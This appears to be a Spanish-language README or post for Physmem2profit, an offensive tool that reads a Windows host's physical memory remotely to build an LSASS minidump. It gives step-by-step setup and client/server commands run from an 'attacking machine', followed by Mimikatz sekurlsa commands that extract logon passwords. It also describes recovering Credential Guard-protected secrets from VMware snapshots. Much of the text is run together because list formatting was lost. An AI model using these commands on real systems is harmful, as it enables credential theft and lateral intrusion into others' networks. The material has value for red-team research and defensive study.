
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
Physmem2profit puede utilizarse para crear un minidump del proceso LSASS de un host objetivo mediante el análisis remoto de la memoria física. La intención de esta investigación es proponer un enfoque alternativo al robo de credenciales y crear un marco modular que pueda ampliarse para admitir otros controladores que puedan acceder a la memoria física. Physmem2profit genera un minidump (.dmp) de LSASS que puede analizarse posteriormente con Mimikatz. La herramienta no requiere Cobalt Strike, pero debería funcionar correctamente a través de beacon con un proxy SOCKS.
La idea se ilustra a continuación:

La herramienta tiene dos componentes:
physmem2profit.exe, ejecutado en el host objetivo
physmem2profit, ejecutado en la máquina atacante
--mode mount, se conecta a la máquina objetivo y monta la RAM física del objetivo como un archivo sin procesar con la ayuda de FUSE--mode dump, invoca varios plugins de Rekall para analizar la imagen de memoria y generar un minidump del proceso LSASS.--mode all, realiza ambas acciones anteriores. La conexión con el servidor se cerrará cuando el volcado esté completo.git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln con Visual Studiobash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] en el objetivo como administrador.
source physmem2profit/client/.env/bin/activate en la máquina atacante. Este comando activará el virtualenv creado por install.sh.cd physmem2profit/client y python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] en la máquina atacante
physmem2profit.exe debe estar ejecutándose en la máquina objetivo antes de ejecutar este comando.output/[label]-[date]-lsass.dmp en la máquina atacante.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"Descifrar las credenciales protegidas por Credential Guard requiere obtener acceso a la clave de cifrado almacenada en el Secure World. Con fines de prueba, Physmem2profit admite la recuperación de datos del Secure World desde instantáneas de VMware Fusion/Workstation (archivos .vmem). Esto permite descifrar las credenciales protegidas por Credential Guard con la ayuda de Mimikatz.
msinfo32 para asegurarte de que Virtualization-based security Services Running dice Credential Guardpython3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp. El minidump contiene un flujo especial que almacena los datos del Secure World, lo que permite a Mimikatz localizar la clave de cifrado.output/[label]-[date]-secure-world.raw.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"El soporte para eludir Credential Guard explotando la vulnerabilidad de firmware S3 Resume, demostrada en nuestra charla de Disobey, estará disponible próximamente :).
Repensando el robo de credenciales | una entrada de blog que explica por qué se eligió este enfoque para el robo de credenciales.
Physmem2profit está desarrollado por @b3arr0 y @TimoHirvonen.
Reconocimientos a los contribuyentes: